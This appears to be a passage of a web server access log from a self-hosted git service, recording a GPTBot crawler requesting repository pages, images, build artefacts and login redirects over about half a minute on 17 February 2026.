GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs/proxy-host-4_access.log" -[17/Feb/2026:18:37:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/npm/data/logs/proxy-host-3_access.log?display=rendered" [Client 74.7.227.38] [Length 11185] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs/proxy-host-3_access.log" -[17/Feb/2026:18:37:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/src-old/WRONG-DESIGNED-log_macros.hpp?display=rendered" [Client 74.7.227.38] [Length 11084] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/src-old/WRONG-DESIGNED-log_macros.hpp" -[17/Feb/2026:18:37:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/npm/data/logs/proxy-host-2_access.log?display=rendered" [Client 74.7.227.38] [Length 11184] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs/proxy-host-2_access.log" -[17/Feb/2026:18:37:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10219] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?sort=oldest&state=closed&type=all" -[17/Feb/2026:18:37:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.3/localpycs" [Client 74.7.227.38] [Length 10596] [Gzip 3.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.3" -[17/Feb/2026:18:37:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.2/localpycs" [Client 74.7.227.38] [Length 10594] [Gzip 3.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.2" -[17/Feb/2026:18:37:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.1/localpycs" [Client 74.7.227.38] [Length 10596] [Gzip 3.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.1" -[17/Feb/2026:18:37:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/html/assets/images/ControlRoom4.png?display=rendered" [Client 74.7.227.38] [Length 11062] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/assets/images/ControlRoom4.png" -[17/Feb/2026:18:37:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/html/assets/images/ControlRoom6.png?display=rendered" [Client 74.7.227.38] [Length 11063] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/assets/images/ControlRoom6.png" -[17/Feb/2026:18:37:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/html/assets/images/ControlRoom3.png?display=rendered" [Client 74.7.227.38] [Length 11063] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/assets/images/ControlRoom3.png" -[17/Feb/2026:18:37:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/html/assets/images/ControlRoom7.png?display=rendered" [Client 74.7.227.38] [Length 11068] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/assets/images/ControlRoom7.png" -[17/Feb/2026:18:37:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/html/assets/images/ControlRoom5.png?display=rendered" [Client 74.7.227.38] [Length 11059] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/assets/images/ControlRoom5.png" -[17/Feb/2026:18:37:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/html/assets/images/ControlRoom1.png?display=rendered" [Client 74.7.227.38] [Length 11062] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/assets/images/ControlRoom1.png" -[17/Feb/2026:18:37:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/html/assets/images/ControlRoom2.png?display=rendered" [Client 74.7.227.38] [Length 11062] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/assets/images/ControlRoom2.png" -[17/Feb/2026:18:37:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10034] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?sort=latest&state=closed&type=all" -[17/Feb/2026:18:37:44 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_upload/main/GoldMonitor/build/GoldMonitor_V5.3/localpycs" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.3/localpycs" -[17/Feb/2026:18:37:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_upload/main/GoldMonitor/build/GoldMonitor_V5.3/localpycs" -[17/Feb/2026:18:37:45 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_upload/main/GoldMonitor/build/GoldMonitor_V5.2/localpycs" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.2/localpycs" -[17/Feb/2026:18:37:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_upload/main/GoldMonitor/build/GoldMonitor_V5.2/localpycs" -[17/Feb/2026:18:37:45 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_upload/main/GoldMonitor/build/GoldMonitor_V5.1/localpycs" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.1/localpycs" -[17/Feb/2026:18:37:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_upload/main/GoldMonitor/build/GoldMonitor_V5.1/localpycs" -[17/Feb/2026:18:37:46 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/GoldMonitor/build/GoldMonitor_V5.2/localpycs" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.2/localpycs" -[17/Feb/2026:18:37:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/GoldMonitor/build/GoldMonitor_V5.2/localpycs" -[17/Feb/2026:18:37:46 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/GoldMonitor/build/GoldMonitor_V5.3/localpycs" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.3/localpycs" -[17/Feb/2026:18:37:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/GoldMonitor/build/GoldMonitor_V5.3/localpycs" -[17/Feb/2026:18:37:47 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/GoldMonitor/build/GoldMonitor_V5.1/localpycs" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.1/localpycs" -[17/Feb/2026:18:37:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/GoldMonitor/build/GoldMonitor_V5.1/localpycs" -[17/Feb/2026:18:37:48 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/GoldMonitor/build/GoldMonitor_V5.1/localpycs" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.1/localpycs" -[17/Feb/2026:18:37:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/GoldMonitor/build/GoldMonitor_V5.1/localpycs" -[17/Feb/2026:18:37:48 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/GoldMonitor/build/GoldMonitor_V5.2/localpycs" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.2/localpycs" -[17/Feb/2026:18:37:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/GoldMonitor/build/GoldMonitor_V5.2/localpycs" -[17/Feb/2026:18:37:49 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/GoldMonitor/build/GoldMonitor_V5.3/localpycs" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.3/localpycs" -[17/Feb/2026:18:37:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/GoldMonitor/build/GoldMonitor_V5.3/localpycs" -[17/Feb/2026:18:37:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.3/localpycs/pyimod02_importers.pyc" [Client 74.7.227.38] [Length 11154] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.3/localpycs" -[17/Feb/2026:18:37:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.2/localpycs/pyimod02_importers.pyc" [Client 74.7.227.38] [Length 11155] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.2/localpycs" -[17/Feb/2026:18:37:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.1/localpycs/pyimod02_importers.pyc" [Client 74.7.227.38] [Length 11155] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.1/localpycs" -[17/Feb/2026:18:37:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.2/localpycs/pyimod04_pywin32.pyc" [Client 74.7.227.38] [Length 11156] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.2/localpycs" -[17/Feb/2026:18:37:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.3/localpycs/pyimod04_pywin32.pyc" [Client 74.7.227.38] [Length 11157] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.3/localpycs" -[17/Feb/2026:18:37:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.3/localpycs/pyimod03_ctypes.pyc" [Client 74.7.227.38] [Length 11157] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.3/localpycs" -[17/Feb/2026:18:37:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.1/localpycs/pyimod03_ctypes.pyc" [Client 74.7.227.38] [Length 11157] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.1/localpycs" -[17/Feb/2026:18:37:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.2/localpycs/pyimod01_archive.pyc" [Client 74.7.227.38] [Length 11156] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.2/localpycs" -[17/Feb/2026:18:37:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.1/localpycs/pyimod01_archive.pyc" [Client 74.7.227.38] [Length 11156] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.1/localpycs" -[17/Feb/2026:18:37:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.2/localpycs/pyimod03_ctypes.pyc" [Client 74.7.227.38] [Length 11158] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.2/localpycs" -[17/Feb/2026:18:37:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.3/localpycs/pyimod01_archive.pyc" [Client 74.7.227.38] [Length 11157] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.3/localpycs" -[17/Feb/2026:18:37:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/GoldMonitor/build/GoldMonitor_V5.3/localpycs/pyimod02_importers.pyc" [Client 74.7.227.38] [Length 32204] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.3/localpycs/pyimod02_importers.pyc" -[17/Feb/2026:18:37:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/GoldMonitor/build/GoldMonitor_V5.2/localpycs/pyimod02_importers.pyc" [Client 74.7.227.38] [Length 944] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.2/localpycs/pyimod02_importers.pyc" -[17/Feb/2026:18:37:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/GoldMonitor/build/GoldMonitor_V5.1/localpycs/pyimod02_importers.pyc" [Client 74.7.227.38] [Length 944] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.1/localpycs/pyimod02_importers.pyc" -[17/Feb/2026:18:37:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/GoldMonitor/build/GoldMonitor_V5.2/localpycs/pyimod04_pywin32.pyc" [Client 74.7.227.38] [Length 9836] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.2/localpycs/pyimod04_pywin32.pyc" -[17/Feb/2026:18:37:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/GoldMonitor/build/GoldMonitor_V5.3/localpycs/pyimod04_pywin32.pyc" [Client 74.7.227.38] [Length 9835] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.3/localpycs/pyimod04_pywin32.pyc" -[17/Feb/2026:18:37:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/GoldMonitor/build/GoldMonitor_V5.3/localpycs/pyimod03_ctypes.pyc" [Client 74.7.227.38] [Length 9834] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.3/localpycs/pyimod03_ctypes.pyc" -[17/Feb/2026:18:37:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/GoldMonitor/build/GoldMonitor_V5.1/localpycs/pyimod03_ctypes.pyc" [Client 74.7.227.38] [Length 9834] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.1/localpycs/pyimod03_ctypes.pyc" -[17/Feb/2026:18:37:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/GoldMonitor/build/GoldMonitor_V5.2/localpycs/pyimod02_importers.pyc" [Client 74.7.227.38] [Length 32204] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.2/localpycs/pyimod02_importers.pyc" -[17/Feb/2026:18:37:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/GoldMonitor/build/GoldMonitor_V5.2/localpycs/pyimod01_archive.pyc" [Client 74.7.227.38] [Length 9836] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.2/localpycs/pyimod01_archive.pyc" -[17/Feb/2026:18:38:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/GoldMonitor/build/GoldMonitor_V5.2/localpycs/pyimod03_ctypes.pyc" [Client 74.7.227.38] [Length 9834] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.2/localpycs/pyimod03_ctypes.pyc" -[17/Feb/2026:18:38:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/GoldMonitor/build/GoldMonitor_V5.3/localpycs/pyimod01_archive.pyc" [Client 74.7.227.38] [Length 9836] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.3/localpycs/pyimod01_archive.pyc" -[17/Feb/2026:18:38:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/GoldMonitor/build/GoldMonitor_V5.3/localpycs/pyimod02_importers.pyc" [Client 74.7.227.38] [Length 944] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.3/localpycs/pyimod02_importers.pyc" -[17/Feb/2026:18:38:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/GoldMonitor/build/GoldMonitor_V5.1/localpycs/pyimod02_importers.pyc" [Client 74.7.227.38] [Length 32204] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.1/localpycs/pyimod02_importers.pyc" -[17/Feb/2026:18:38:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/GoldMonitor/build/GoldMonitor_V5.1/localpycs/pyimod01_archive.pyc" [Client 74.7.227.38] [Length 9836] [Gzip 2.89] [Sent-to 192.168.0.250] 